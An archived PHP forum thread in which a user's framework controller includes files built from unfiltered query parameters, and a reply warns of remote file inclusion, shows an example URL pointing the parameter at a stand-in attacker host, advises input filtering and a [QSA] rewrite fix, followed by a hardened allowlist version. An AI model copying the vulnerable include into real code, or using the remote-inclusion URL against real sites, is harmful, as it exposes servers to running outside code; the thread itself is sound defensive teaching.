TalkPHP - General - Help with GET (http://www.talkphp.com/general/5643-help-get.html)

jwilson122 11-26-2010 01:08 AM

Help with GET
 
Okay so I'm creating my own framework script, the URLs are gonna be:
controller.php?folder=foldernamehere&page=pagenamehere

So in the controller.php I have..
PHP Code:

$folder = $_GET['folder'];
$page   = $_GET['page'];
// the two query-string values are used unfiltered to build the include path
include('plugins/'.$folder.'/'.$page.'.php');

Then in .htaccess I will do:
RewriteEngine On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2

Well, works out fine if I access say.. /users/index.php it will display the info perfect! But, on to my issue.
Well, say on that /users/index.php file, I want to get something from the URL... say, /users/index.php?user=bla
Well, it will not work for some reason! Any idea why? I believe it's because I already have used it in the .htaccess file, but not sure.. How can I fix it? Thanks a lot!

sketchMedia 11-26-2010 03:31 PM

Two things, first of all the obvious security issues with that script. NEVER just allow user input to be used in scripts without first filtering them. With your example one could enter this into the URL param and be able to execute dangerous code from an external source on your server as if it came from your server, for example:

PHP Code:

include "{$_GET['folder']}/include.php";

If I then do this:
Code:

http://yourserver.com/script.php?folder=http://evilscriptslol.com/evil.inc?

In the PHP this would mean:

PHP Code:

include "http://evilscriptslol.com/evil.inc?/include.php";

Causing no end of problems (assuming allow_url_fopen is enabled, as it is by default I believe). A simple switch would help mitigate the threat somewhat.

Filter Input Escape Output
- Golden rule of web-development (and most other types of development)

Secondly to your actual problem, try adding [QSA] to the end of your rewrite rule:
Code:

RewriteEngine On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2 [QSA]

It should then pass any additional URL parameters through.
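To make the "filter input" advice concrete, here is an added example of what a hardened controller.php could look like; it is not code from the thread or from either poster. It assumes the same layout as the original post (plugin files under plugins/<folder>/<page>.php next to controller.php), a PHP 7 or newer interpreter, and that the .htaccess rule above carries the [QSA] flag so that extra parameters such as ?user=bla still reach the included page through $_GET:

```php
<?php
// Added example (not from the thread): a hardened version of the
// controller.php include discussed above. Assumes plugins live under
// ./plugins/<folder>/<page>.php relative to this file (hypothetical layout).
declare(strict_types=1);

const PLUGIN_ROOT = __DIR__ . '/plugins';

/**
 * Resolve folder/page from the query string to a file inside PLUGIN_ROOT.
 * Returns the absolute path, or null if the request must be rejected.
 */
function resolvePluginPath(string $folder, string $page): ?string
{
    // 1. Allow only a strict character set. No slashes, dots, colons or
    //    URL schemes, so values like "http://host/x?" or "../../etc/passwd"
    //    are refused before the filesystem is touched.
    $safeName = '/^[A-Za-z0-9_-]{1,32}$/';
    if (!preg_match($safeName, $folder) || !preg_match($safeName, $page)) {
        return null;
    }

    // 2. Defence in depth: resolve the real path and confirm it is still
    //    below PLUGIN_ROOT. realpath() returns false for missing files.
    $root      = realpath(PLUGIN_ROOT);
    $candidate = realpath(PLUGIN_ROOT . '/' . $folder . '/' . $page . '.php');
    if ($root === false || $candidate === false) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/** Read a query parameter as a string; arrays (?folder[]=x) count as absent. */
function queryString(string $key, string $default): string
{
    return (isset($_GET[$key]) && is_string($_GET[$key])) ? $_GET[$key] : $default;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs for a quick local check from the command line.
    $samples = [
        ['users', 'index'],                                   // legitimate
        ['http://evilscriptslol.com/evil.inc?', 'index'],     // remote include attempt
        ['..', 'controller'],                                 // directory traversal
        ['users', 'index.php'],                               // extension smuggling
    ];
    foreach ($samples as [$f, $p]) {
        $result = resolvePluginPath($f, $p);
        printf("folder=%-40s page=%-12s => %s\n", $f, $p, $result ?? 'REJECTED');
    }
    exit;
}

$target = resolvePluginPath(queryString('folder', ''), queryString('page', 'index'));
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}
// Any extra parameters passed through by [QSA] (e.g. ?user=bla) remain
// available to the included page via $_GET.
include $target;
```

The character allowlist does the real work: it rejects anything that could change the meaning of the path (a scheme, a slash, a dot segment), so the value of allow_url_fopen no longer matters for this include. The realpath() containment check is there in case the allowlist is ever loosened; when run from the CLI, only the first constructed sample resolves (and only if plugins/users/index.php actually exists), while the other three are rejected by the allowlist alone.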

jwilson122 11-27-2010 12:36 AM

Quote:

Originally Posted by sketchMedia (Post 31265)
Two things, first of all the obvious security issues with that script. NEVER just allow user input to be used in scripts without first filtering them. With your example one could enter this into the URL param and be able to execute dangerous code from an external source on your server as if it came from your server, for example:

PHP Code:

include "{$_GET['folder']}/include.php";

If I then do this:
Code:

http://yourserver.com/script.php?folder=http://evilscriptslol.com/evil.inc?

In the PHP this would mean:

PHP Code:

include "http://evilscriptslol.com/evil.inc?/include.php";

Causing no end of problems (assuming allow_url_fopen is enabled, as it is by default I believe). A simple switch would help mitigate the threat somewhat.

Filter Input Escape Output
- Golden rule of web-development (and most other types of development)

Secondly to your actual problem, try adding [QSA] to the end of your rewrite rule:
Code:

RewriteEngine On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2 [QSA]

It should then pass any additional URL parameters through.

Thanks a lot! It says internal server error with your code :/

Quote:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

sketchMedia 11-29-2010 10:24 AM

Should work; can I see your full .htaccess?
